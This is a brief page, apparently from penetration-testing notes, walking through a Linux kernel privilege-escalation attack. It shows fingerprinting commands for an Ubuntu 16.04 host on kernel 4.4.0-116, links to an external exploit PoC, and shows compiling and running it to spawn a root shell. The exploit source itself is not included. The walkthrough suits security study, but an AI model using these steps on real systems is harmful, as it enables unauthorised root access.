search

Kernel Exploits

hashtag
Sample Exploitation

  1. Check the kernel level and the os version

    $ uname -a

Linux NIX02 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

    $ cat /etc/lsb-release 

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.4 LTS"

  2. As we can see, the machine is a Linux Kernel 4.4.0-116 on an Ubuntu 16.04.4 LTS, a quick google search will show this thisarrow-up-right exploit PoC

  3. Exploit

    $ gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit
$ ./kernel_exploit 

task_struct = ffff8800b71d7000
uidptr = ffff8800b95ce544
spawning root shell

PreviousLinux Internals-BasedNextShared Libraries

Last updated